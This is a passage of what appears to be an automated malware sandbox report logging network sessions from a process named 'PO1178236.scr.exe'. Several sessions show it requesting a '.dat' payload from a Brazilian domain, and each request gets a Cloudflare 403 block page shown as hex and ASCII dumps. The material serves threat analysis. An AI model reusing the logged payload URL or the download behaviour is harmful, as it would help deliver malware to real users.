65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a
        Data Ascii: m:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2099dc743fd</strong></span> <span class="cf-footer-separator sm:
        2025-01-09 07:36:43 UTC1006INData Raw: 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 30 39 39 64 63 37 34 33 66 64 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 77 4d 79 34 77 4d 44 41 77 4d 44 41 3d
        Data Ascii: > window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2099dc743fd',t:'MTczNjQwODIwMy4wMDAwMDA=
        2025-01-09 07:36:43 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        77192.168.2.949785188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:44 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:44 UTC1007INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:44 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:59 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BOYN4xkKFzcKhZcFx57pnVK%2FCVu1DZG%2B9ii37a5jTeXAVV91NT0j8awcwmrt8PVzb%2BawoHJI9GWhYCJa4TBXkkonzvM9uczgdqJwh2xblw68zEbQBZZ0N4FuO%2Fgrip7G4aY363QhQ3RSjlem"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c20dfd8943ed-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1566&rtt_var=592&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1839949&cwnd=210&unsent_bytes=0&cid=9b0e33b633204e0c&ts=194&x=0"
        2025-01-09 07:36:44 UTC362INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:44 UTC1369INData Raw: 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65
        Data Ascii: flare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=de
        2025-01-09 07:36:44 UTC1369INData Raw: 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70
        Data Ascii: cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.cap
        2025-01-09 07:36:44 UTC1369INData Raw: 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 30 64 66 64 38 39 34 33 65 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e
        Data Ascii: -left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c20dfd8943ed</strong></span> <span class="cf-footer-separator sm:hidden
        2025-01-09 07:36:44 UTC1000INData Raw: 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 30 64 66 64 38 39 34 33 65 64 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 77 4e 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72
        Data Ascii: ndow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c20dfd8943ed',t:'MTczNjQwODIwNC4wMDAwMDA='};var
        2025-01-09 07:36:44 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        78192.168.2.949786188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:45 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:45 UTC1011INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:45 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:00 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4V4M4XG6CwNXyV8KUB%2FHBKZ4q6MifUcqbtB%2FdPjn0VN%2FcBy7WL22uBD%2Fltmr4pDejT38%2ByOHY%2FkBbkl2NxAJAxaC0sicDaVBym9xfvEofs11TXtUteHBFGfWKT6E4zeLpr2ukVYxhklkxx0h"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2121e5c1a2c-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2063&min_rtt=2010&rtt_var=792&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1452736&cwnd=174&unsent_bytes=0&cid=6a99f87cf25f14ae&ts=141&x=0"
        2025-01-09 07:36:45 UTC358INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:45 UTC1369INData Raw: 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74
        Data Ascii: loudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="widt
        2025-01-09 07:36:45 UTC1369INData Raw: 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f
        Data Ascii: tion cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /
        2025-01-09 07:36:45 UTC1369INData Raw: 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 31 32 31 65 35 63 31 61 32 63 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69
        Data Ascii: text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2121e5c1a2c</strong></span> <span class="cf-footer-separator sm:hi
        2025-01-09 07:36:45 UTC1004INData Raw: 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 31 32 31 65 35 63 31 61 32 63 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 77 4e 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2121e5c1a2c',t:'MTczNjQwODIwNS4wMDAwMDA='}
        2025-01-09 07:36:45 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        79192.168.2.949787188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:45 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:45 UTC1011INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:45 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:00 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XKLAgFKy1BVDxEoYCHlze52XmHvUs9xJDK8g8R3vaDQwlsY6IGrniIvZqOxFhCsWafsZsF%2Bo9BmpWf9XTc3Q%2BiNuU7hflR%2B7bSrPCve%2BfOdgYFKxwxdhumRqrHLa%2Bo5A%2BZB78PQWXp0FxR8x"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c215f8607271-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1964&min_rtt=1958&rtt_var=747&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1453459&cwnd=225&unsent_bytes=0&cid=f7dd38d147e498c6&ts=148&x=0"
        2025-01-09 07:36:45 UTC358INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:45 UTC1369INData Raw: 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74
        Data Ascii: loudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="widt
        2025-01-09 07:36:45 UTC1369INData Raw: 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f
        Data Ascii: tion cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /
        2025-01-09 07:36:45 UTC1369INData Raw: 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 31 35 66 38 36 30 37 32 37 31 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69
        Data Ascii: text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c215f8607271</strong></span> <span class="cf-footer-separator sm:hi
        2025-01-09 07:36:45 UTC1004INData Raw: 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 31 35 66 38 36 30 37 32 37 31 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 77 4e 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c215f8607271',t:'MTczNjQwODIwNS4wMDAwMDA='}
        2025-01-09 07:36:45 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        80192.168.2.949788188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:46 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:46 UTC1013INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:46 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
